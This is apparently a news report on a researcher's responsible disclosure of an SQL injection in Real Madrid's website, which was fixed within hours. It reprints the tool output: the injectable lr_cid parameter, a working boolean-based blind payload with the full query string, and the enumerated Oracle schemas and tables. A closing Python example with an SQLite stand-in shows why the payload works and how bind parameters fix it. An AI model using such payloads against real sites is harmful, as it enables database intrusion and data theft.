A Greek researcher identified a major security gap in Real Madrid's official website, which allowed him to perform a successful SQL injection and gain access to data in the team's database.
On October 10, Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate, and the problem was fixed within a few hours.
It is worth noting that the website's database had over 7,000 tables and held a great deal of important data, such as millions of customer accounts from the team's official store.
Some vulnerability information:
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c=RM_Noticia_FA&lr_cid=-8384 OR 8642=8642&lr_language=de&lr_pid=3&pagename=RealMadridResponsive/Comunes/Logica/urlCambioIdioma
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+---------------------+
| RLM$PARSEDCOND      |
+---------------------+
Database: XDB
[2 tables]
+---------------------+
| XDB$IMPORT_TT_INFO  |
| XDB$XIDX_IMP_T      |
+---------------------+
Database: APEX_030200
[3 tables]
+---------------------+
| WWV_FLOW_DUAL100    |
| WWV_FLOW_LOV_TEMP   |
| WWV_FLOW_TEMP_TABLE |
+---------------------+
Database: SYSTEM
[4 tables]
+---------------------+
| HELP                |
| OL$                 |
| OL$HINTS            |
| OL$NODES            |
+---------------------+
Database: FATWIREDLV
[3437 tables]
Database: SYS
[26 tables]
Database: MDSYS
[35 tables]
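Why the lr_cid payload reported above changes the query, and how validation plus a bind parameter closes it, as an added example that is not code from the affected site or from the researcher. An in-memory SQLite table stands in for the Oracle back end; the table name `news`, the sample rows and the function names are hypothetical.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data; SQLite stands in for the Oracle back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (cid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(101, "Match report"), (102, "Press conference"), (103, "Ticket sales")],
    )
    return db


def lookup_concatenated(db, lr_cid):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so "-8384 OR 8642=8642" is parsed as (cid = -8384) OR (8642 = 8642).
    sql = "SELECT title FROM news WHERE cid = " + lr_cid
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, lr_cid):
    # Hardened pattern, step 1: the parameter is a numeric id, so anything
    # that is not a plain integer is rejected before it reaches the database.
    if not re.fullmatch(r"-?[0-9]{1,18}", lr_cid):
        return None  # caller should answer with HTTP 400
    # Step 2: the value travels as a bind parameter, never as SQL text.
    rows = db.execute("SELECT title FROM news WHERE cid = ?", (int(lr_cid),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "-8384 OR 8642=8642"  # lr_cid value from the report above
    # A bare -8384 matches nothing; with the tautology every row matches.
    # That visible difference in the response is what "boolean-based blind"
    # detection relies on.
    print("concatenated, -8384:  ", lookup_concatenated(db, "-8384"))
    print("concatenated, payload:", lookup_concatenated(db, payload))
    print("bound, payload:       ", lookup_bound(db, payload))
    print("bound, 101:           ", lookup_bound(db, "101"))
```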
Awareness of vulnerabilities discovered in organizations is considered extremely necessary (especially when they affect high-traffic websites), and for us they are an immediate priority.